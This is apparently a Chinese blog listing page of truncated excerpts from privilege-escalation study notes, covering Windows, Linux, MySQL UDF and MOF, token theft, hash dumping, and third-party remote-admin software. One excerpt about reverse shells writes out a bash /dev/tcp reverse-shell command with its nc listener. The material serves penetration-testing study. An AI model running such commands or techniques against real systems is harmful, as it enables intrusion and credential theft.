提权学习

windows提权

windows提权学习笔记一、系统内核溢出漏洞提权溢出漏洞就像往杯子里装水—如果水太多,杯子装不下了,就会溢出来。计算机中有个地方叫缓存区。
Lend me·2023-10-13 00:50

MySQL数据库UDF提权学习

MySQL数据库UDF提权学习——数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除Access数据库外,其他数据库基本都存在数据库提权的可能。
Goodric·2023-08-12 02:50

Linux 提权学习

提权的目的是获取root权限root权限可获取shadow文件中的密码Hash,若内网环境中存在「账户/密码复用」的情况,可用于横向扩展暴力破解suid提权内核漏洞提权定时任务提权sudo提权第三方服务提权(docker、mysql、redis、NFS提权)暴力破解爆破root用户的密码有一个工具,sucrack——————suid提权suid(SetownerUserIDuponexecutio
Goodric·2023-04-19 05:53

Windows令牌窃取提权和烂土豆提权学习

Windows令牌窃取提权和烂土豆提权学习令牌,又叫token,是系统临时产生的秘钥,相当于账号密码,用来决定是否允许此次请求和判断此次请求是属于哪一个用户。
Goodric·2022-07-25 10:57

提权学习之旅——Windows操作系统提权

本文首发于先知社区https://xz.aliyun.com/t/8091前言:了解基础知识之后,这次就来仔细学一下Windows操作系统的提权。Windows提权基础0x00:Windows提权的大致方向拿到一个低权限时要进行提权,首先要清楚从哪里入手,清楚了提权的大致方向,才能事半功倍。其中比较常见而且利用较多的有内核提权数据库提权应用提权中间人劫持等0x01:Windows基础提权命令查询系
Sn0w/·2022-05-21 16:19

提权学习:第三方软件提权(破解hash 提权、MFS 破解hash 提权、GetPass 破解hash提权、QuarksPwDump 破解hash提权)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录破解hash值提权0x01Pwdunp7破解hash0x02GetPass破解hash0x03hash传递入侵MSF加载0x04QuarksPwDump破解hash1.使用QuarksPwDump本地帐号的哈希值2.使用QuarksPwDump导出账号实例(导出本地帐号到文件)3.配合ntdsutil工具导出域控密码(导出快照文件)破解hash
Agan '·2020-09-16 07:01

提权学习之旅——Linux操作系统提权

首发于先知社区https://xz.aliyun.com/t/8139前言:上次学习了Windows操作系统的提权以及相关工具的利用,这次就来学习一下Linux操作系统的提权Linux提权基础0x00:Linux提权方法大致归纳总结如下:不过最核心也是最常见的提取方法还是内核提权,其他大多与程序员的配置有关,出现的几率不是很高。0x01:Linux提权基础知识uname-a查看内核版本id显示用户
~Lemon·2020-09-14 09:05

提权学习:反弹shell的实现方式和检测方法

我所理解的反弹shell,是外部人员通过web或者软件的漏洞,建立了一个数据流通向网络外部的shell执行环境。现在针对一些网络上反弹shell实例作说明:反弹shell现在针对一些网络上反弹shell实例作说明:实例1,Bash反弹:Bash反弹,远程主机监听端口:nc-lvp7777被入侵的机器反弹shell命令如下:bash-i>&/dev/tcp/192.168.7.61/77770>&1
Agan '·2020-08-25 15:45

Linux 提权学习小结

参考文章Linux提权:从入门到放弃前言粗略地看了一下,Windows提权方式相较于Linux多太多了。所以先搞搞Linux提权。基本知识这是使用ls-l命令得到的结果,通过此方式可以看到各用户对文件的权限drwxr-xr-x4kalikali4096Jun712:13CVE-2020-0796-rw-r--r--1kalikali2419716Aug1706:14result.txt#其中第一列
R0oKi3·2020-08-21 16:00

提权学习总结

Windows提权:Windows提权总结Windows组策略首选项提权Windows错误配置提权Windows内核溢出漏洞提权绕过UAC提权WindowsPR提权Linux提权:Linux提权总结Linux下用SUID提权Linux提权之利用/etc/passwd文件Linux提权—脏牛漏洞(CVE-2016-5195)
谢公子·2020-08-21 01:36

提权学习:提权拿服务器方法总结-超细(补充节点0x02)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录【web提权】dos命令大全SQL语句直接开启3389常见杀软windows提权中敏感目录和敏感注册表的利用提权中的敏感注册表位置wscript.shell的删除和恢复如何找到准确的终端连接端口?本地溢出提权sa提权root提权serv-u提权端口转发nc反弹提权星外提权ee提权法vbs提权法360提权搜狗提权华众虚拟主机提权N点虚拟主机拖库服
bylfsj·2020-08-10 15:33

提权学习之旅——基础篇

首发于先知社区https://xz.aliyun.com/t/8054前言:无论是CTF赛题还是渗透测试,有很多时候拿到WebShell的权限并不高,没有办法继续深入,所以需要进行提权操作,方便下一步的进行。基础知识0x00:什么是提权提高自己在服务器中的权限,主要针对网站入侵过程中,当入侵某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限。简单的一句话就是权限提升。例如:Wind
~Lemon·2020-08-05 19:20

提权学习:初识提权

当你的才华还撑不起你的野心时那你就应该静下心来学习目录初识提权0x01什么是提权?0x02通常脚本所处的权限0x03Windwos常见提权(一)、本地提权(二)、数据库提权(三)、第三方软件提权(四)、提权辅助0x04收集信息0x05信息收集常用命令0x06上传的大马,运行cmd无法执行?0x07查看3389端口0x08端口转发0x09常见虚拟主机常见路径初识提权0x01什么是提权?很多时候我们入
Agan '·2020-08-01 10:49

提权学习:MySQL数据库提权(mof 漏洞提权)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录MySQLmof漏洞介绍漏洞介绍传送门前言原理拓展知识:MySQLmof漏洞介绍漏洞介绍传送门http://www.exploit-db.com/exploits/23083/http://www.exploit-db.com/sploits/23083.zip前言Windows管理规范(WMI)提供了以下三种方法编译到WMI存储库的托管对象格
Agan '·2020-07-31 13:06

提权学习:MySQL数据库提权(UDF 提权)

目录UDFUDF提权UDFUDF(userdefinedfunction),即用户自定义函数。是通过添加新函数,对MySQL的功能进行扩充,其实就像使用本地MySQL函数如user()或concat()等。那么,我们该如何使用UDF?假设我的UDF文件名为udf.dll,存放在MySQL安装目录的lib/plugin目录下。在UDF中,我定义了名为sys_eval的mysql函数,该函数可以执行系
Agan '·2020-07-31 13:06

提权学习:第三方软件提权(VNC 提权)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录VNC提权0x01介绍0x02上述利用方式演示0x03另外一种方式就是通过大马:拓展知识vnc远控提权:VNC提权0x01介绍UltraVNC是开源的远程终端模拟软件,在国外应用非常广泛。不走的钟在渗透韩国服务器时遇到UltraVNC,网络中只有读取VNC注册表的提权方法,但UltraVNC测试不成功,本地安装UltraVNC测试,发现它的本地
Agan '·2020-07-13 00:48

Day10——提权学习之第三方软件FlashFXP及pcAnywhere提权

0x00FlashFXP提权1、FlashFXP简介FlashFXP是一款功能强大的FXP/FTP软件,集成了其它优秀的FTP软件的优点,如CuteFTP的目录比较,支持彩色文字显示;如BpFTP支持多目录选择文件,暂存目录;又如LeapFTP的界面设计。2、提权思路利用FlashFXP替换文件漏洞,可以读取管理员链接过的站点账号密码。3、提权步骤(1)下载quick.dat这个文件链接的账号密码
0nc3·2020-06-26 17:19

Day9——提权学习之第三方软件FileZilla提权

0x00FileZilla简介FileZilla是一个免费开源的FTP软件,分为客户端版本和服务器版本,具备所有的FTP软件功能。FileZilla的默认端口为14147,只侦听在127.0.0.1的14147端口上,所以无法从外部直接访问,需要进行端口转发(使用lcx工具(lcx具有三个功能:监听、转发、端口转向))。默认安装目录下有两个敏感文件filezillaserver.xml(包含用户信
0nc3·2020-06-26 17:19

Day11——提权学习之第三方软件VNC提权

0x00VNC简介VNC(VirtualNetworkConsole)是虚拟网络控制台的缩写。它是一款优秀的远程控制工具软件,由著名的AT&T的欧洲研究实验室开发的。0x01提权思路安装VNC后会在注册表中保留VNC的密码,通过WEBSHELL远程读取注册表中的密码信息并在本地破解VNC密码进行远程连接来达到提权目的。0x02提取步骤1、通过读取注册表十进制数(1)RealVNC的注册表路径:HK
0nc3·2020-06-26 17:19

Day12——提权学习之第三方软件Radmin提权

0x00Radmin简介Radmin是平时在windows下用的比较多的一个远程管理工具。其具有支持多个连接和IP过滤(即允许特定的IP控制远程机器)、个性化的档互传、远程关机、支持高分辨率模式、基于WindowsNT的安全支持及密码保护以及提供日志文件支持等特性。默认开放4899端口Radminserver2.X、Radminserver3.0都存在一个“致命”漏洞——radminhash提权漏
0nc3·2020-06-26 17:19

Day8——提权学习之第三方软件G6-FTP提权

0x00G6-FTP简介G6FTPServer新一代的FTP服务器端软件,支持RFC-959标准并增强其中的某些功能,上传和下载都可以续传,实时查看运行状态,占用带宽,还有很多功能。G6-FTP的默认端口为8021,只侦听在127.0.0.1的8021端口上,所以无法从外部直接访问,需要进行端口转发(使用lcx工具(lcx具有三个功能:监听、转发、端口转向))。0x01提取方法1、通过执行bat文
0nc3·2020-06-26 17:19

【转】Meterpreter综合提权

文章内容:学习`Meterpreter`自动提权学习溢出漏洞模块提权学习后续提权操作学习`AlwaysInstallElevated`提权part1Meterpreter自动提权本部分主要学习在获得目标机器的一定权限后
钦玄·2020-01-01 16:06

提权学习:MySQL反弹Shell提权

当你的才华还撑不起你的野心时那你就应该静下心来学习目录mysql反弹shell提权0x01介绍0x02适用场景0x03前言0x04手工操作0x05MSF反弹Shell0x06额外拓展知识MySQL反弹shell提权0x01介绍mysql提权之反弹shell,其实这也属于udf提权,只不过应用场景不同,比如现在我们没有webshell但是我们却有偶然得到了mysql的root密码(弱口令等),恰巧目
Causal_Escap·2019-08-22 01:06

提权学习:Linux普通用户提权为root

当你的才华还撑不起你的野心时那你就应该静下心来学习目录Linux普通用户提权为root接下来直接看实例Linux普通用户提权为root我记得我以前用Linux的时候,忘记root密码是常有的事情,很多时候大家都会选择重启系统,进入单用户模式重置root密码,但在实际运维工作中,就未必能任性重启了。分享一个不必重启也能切换至root用户的方法给大家。接下来直接看实例1.查看系统环境cat/etc/c
Causal_Escap·2019-08-21 00:01

提权学习:MySQL 提权实例讲解

当你的才华还撑不起你的野心时那你就应该静下心来学习目录0x01环境搭建0x02MySQL提权实例MySQL账户密码获取方法其它Mysql骚操作类型提权如下0x01环境搭建本次使用环境搭建教程地址:https://blog.csdn.net/God_XiangYu/article/details/99819406我把这位大佬的文章拆分成碎片化来阅读,感觉会更加的提高效率,要不然全部放在一堆查阅,我自
Causal_Escap·2019-08-20 14:15

提权学习:第三方软件提权(巴西烤肉提权和启动项提权)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录巴西烤肉提权启动项提权0x01启动项提权0x02启动项提权,拓展知识【写入启动项提权/启动项里提权】巴西烤肉提权首先,基本提权前看一下,wscript组建是否支持,如果支持的话,那我们可以传一个cmd.exe,我传了一个免杀的CMD80K,网上应该有很多,可以去网上下载。然后咱们大马右边的记录勾下来。选择Shell路径:D:\fasfcmd80
Causal_Escap·2019-08-20 02:50

提权学习:第三方软件提权(搜狗输入法提权)

原文链接:http://www.wooyun.org/whitehats/goubuli当你的才华还撑不起你的野心时那你就应该静下心来学习目录搜狗输入法提权0x01介绍0x02搜狗输入法提权演示0x03漏洞证明:0x04修复方案:搜狗输入法提权0x01介绍不少管理都使用五笔打字,不过还是有少数人喜欢用拼音,智能ABC功能少,没有全拼功能,所以大多都选择了搜狗输入法,包括我,我也喜欢使用搜狗输入法,
Causal_Escap·2019-08-19 23:56

提权学习:第三方软件提权(FlashFXP 替换文件漏洞提权)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录FlashFXP替换文件漏洞提权0x01前言介绍用途特点0x02环境配置0x03FlashFXP提权思维导图0x04操作演示FlashFXP替换文件漏洞提权0x01前言介绍FlashFXP是一个功能强大的FXP/FTP软件,融合了一些其他优秀FTP软件的优点,如像CuteFTP一样可以比较文件夹,支持彩色文字显示;像BpFTP支持多文件夹选择文
Causal_Escap·2019-08-19 16:36

提权学习:第三方软件提权(Radmin 提权)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录Radmin提权0x01介绍0x02利用方式常见虚拟主机常见路径第一种方式:手工查询注册表爆hash值第二种方式:通过大马爆hash值拓展知识0x03反汇编破解Radmin密码实例0x04利用各种shell获取注册表的方法0x05拓展知识radmin2.1提权Radmin提权0x01介绍Radmin是一款屡获殊荣的远程控制软件(服务器管理),它
Causal_Escap·2019-08-18 17:57

提权学习:第三方软件提权(PcAnywhere 提权)

当你的才华还撑不起你的野心时那你就应该静下心来学习目录第三方软件提权PcAnywhere提权0x01介绍0x02原理0x03前言0x04思路:0x05操作步骤演示:0x06说一点题外话:第三方软件提权PcAnywhere提权0x01介绍PcAnywhere是一款远程控制软件,PcAnywhere的出现是为了方便网管人员管理服务器。安装之后默认监听“5631端口”。它可以将电脑当成主控端去控制远方的
Causal_Escap·2019-08-18 11:46

提权学习:第三方软件提权(Server-u 提权)

当你的才华还撑不起你的野心时那你就应该静下心来学习第三方软件提权Server-u提权Serv-UFTPServer,是一种被广泛运用的FTP服务器端软件,支持3x/9x/ME/NT/2K等全Windows系列。可以设定多个FTP服务器、限定登录用户的权限、登录主目录及空间大小等。对于可写权限的,可以通过手工修改ServUDaemon.ini文件来修改用户密码了。但是注意这样修改后的密码,需要重起S
Causal_Escap·2019-08-17 21:54

提权学习:提权拿服务器方法总结-超细(补充节点0x02)

原文链接:https://www.cnblogs.com/xiaolangjun/p/6863503.html当你的才华还撑不起你的野心时那你就应该静下心来学习目录【web提权】dos命令大全SQL语句直接开启3389常见杀软windows提权中敏感目录和敏感注册表的利用提权中的敏感注册表位置wscript.shell的删除和恢复如何找到准确的终端连接端口?本地溢出提权sa提权root提权serv
Causal_Escap·2019-08-17 16:11

提权学习:提权拿服务器方法总结-超细(补充节点0x01)

原文链接:https://blog.csdn.net/xysoul/article/details/44491239当你的才华还撑不起你的野心时那你就应该静下心来学习目录WebShell权限提升技巧Ring的权限提升21大法WEBSHELL权限提升1.我相信很多朋友刚拿到webshell以后都会尝试是否能执行CMD命令,如果可以执行CMD的话我相信能给提权拿服务器省去很多时间。如果不能执行CMD命
Causal_Escap·2019-08-17 15:49

提权学习笔记

WEB提权1.能不能执行cmd就看这个命令:netuser,net不行就用net1,再不行就上传一个net到可写可读目录,执行c:\windows\temp\cookies\net1.exeuser2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp,之后使用刚提权的用户登录进去就是system权限,再试试一般就可以了。3.cmd拒绝访问的话就自己上
FLy_鹏程万里·2018-06-07 17:05
上一页 1 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他